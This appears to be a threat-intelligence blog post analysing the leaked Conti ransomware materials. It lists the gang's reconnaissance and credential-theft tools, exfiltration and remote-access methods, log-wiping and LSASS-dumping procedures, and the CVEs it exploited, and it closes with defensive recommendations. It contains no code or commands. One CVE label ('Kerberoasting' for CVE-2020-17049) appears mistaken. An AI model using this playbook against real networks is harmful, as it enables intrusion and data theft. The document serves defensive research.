Conti Leaks: Tools and Techniques
All Research

Conti Leaks: Tools and Techniques

r00t |
ransomware conti threat-intelligence leaks

Following the Russian invasion of Ukraine, various cyber gangs publicly declared allegiances. A Conti ransomware group member leaked substantial data including operational tools, training documentation, and internal communications. The dataset, shared with security researchers and @vxunderground, contained nearly two years of chat logs beginning January 2021.

Evidence suggests Conti operates as either a fork of Ryuk ransomware or involves overlapping threat actors. Analysis of leaked Bitcoin addresses indicates the group accumulated approximately 65,498 BTC (~$2.88 billion USD at $44k per coin) between April 21, 2021, and February 28, 2022.

Tools & Techniques: Conti’s “FastGuide”

The leaked materials revealed the organization’s systematic approach to enterprise compromise, privilege escalation, lateral movement, and persistence establishment.

Active Directory & Reconnaissance

  • Adfind.exe: Command-line Active Directory query tool
  • Rubeus: Kerberos interaction and exploitation toolset
  • Invoke-Kerberoast.ps1: Kerberoasting credential extraction
  • SharpChromium: Extracts browser data from Chrome and Edge

System Enumeration

  • Veil PowerTools: PowerShell offensive collections
  • Seatbelt.exe: Security-focused host survey utility
  • Net-GPPPassword: Retrieves Group Policy Preferences plaintext credentials
  • ShareFinder.ps1: Admin share discovery
  • Invoke-SMBAutoBrute.ps1: Domain account brute forcing
  • NtdsAudit: Active Directory database auditing
  • SharpView: .NET PowerView implementation

Data Exfiltration Methods

  • Microsoft Exchange mailbox export
  • Rclone cloud synchronization
  • FileZilla FTP transfers
  • MEGA cloud storage

Remote Access Infrastructure

  • Ngrok tunnel deployment
  • Ngrok service installation via NSSM
  • AnyDesk remote desktop

Additional Tools

  • WinPwn: PowerShell reconnaissance and exploitation
  • PEASS-ng: Privilege escalation framework
  • dazzleUP: Misconfiguration detection
  • Watson: KB vulnerability enumeration
  • Responder: LLMNR/NBT-NS poisoning
  • SharpHound/BloodHound: Attack path analysis
  • Mimikatz: Credential extraction techniques

Operational Procedures

  • RDP port modification for concealment
  • LSASS dumping without Mimikatz
  • Event log deletion and sanitization

Targeted Vulnerabilities

The group exploited multiple critical CVEs:

Privilege Escalation & Domain Compromise

  • CVE-2020-1472 (Zerologon)
  • CVE-2020-17049 (Kerberoasting)
  • CVE-2021-36934 (HiveNightmare)
  • CVE-2021-36942 (PetitPotam)

Remote Code Execution

  • CVE-2019-0708 (BlueKeep)
  • CVE-2020-0796 (SMBGhost)
  • CVE-2021-34473
  • CVE-2021-31207
  • CVE-2021-34523

EternalBlue Suite

  • CVE-2017-0143
  • CVE-2017-0144
  • CVE-2017-0145
  • CVE-2017-0146
  • CVE-2017-0148

Defensive Recommendations

Organizations should implement:

  • User awareness and phishing training
  • Consistent patch management processes
  • Modern endpoint detection and response (EDR) solutions
  • Vulnerability management and attack surface reduction
  • Security information and event management (SIEM)
  • Zero Trust backup architectures
  • Penetration testing programs

Leaked Data Artifacts

SHA256 hashes provided for verification of leaked datasets:

  • Chat Logs 2020.7z
  • Documentation Leak.7z
  • Internal Software Leak.7z
  • Jabber Chat Logs 2021-2022.7z
  • Locker Leak.7z
  • Pony Leak 2016.7z
  • Rocket Chat Leaks.7z
  • Screenshots December 2021.7z
  • Toolkit Leak.7z
  • Trickbot Forum Leak.7z
  • Trickbot Leaks.7z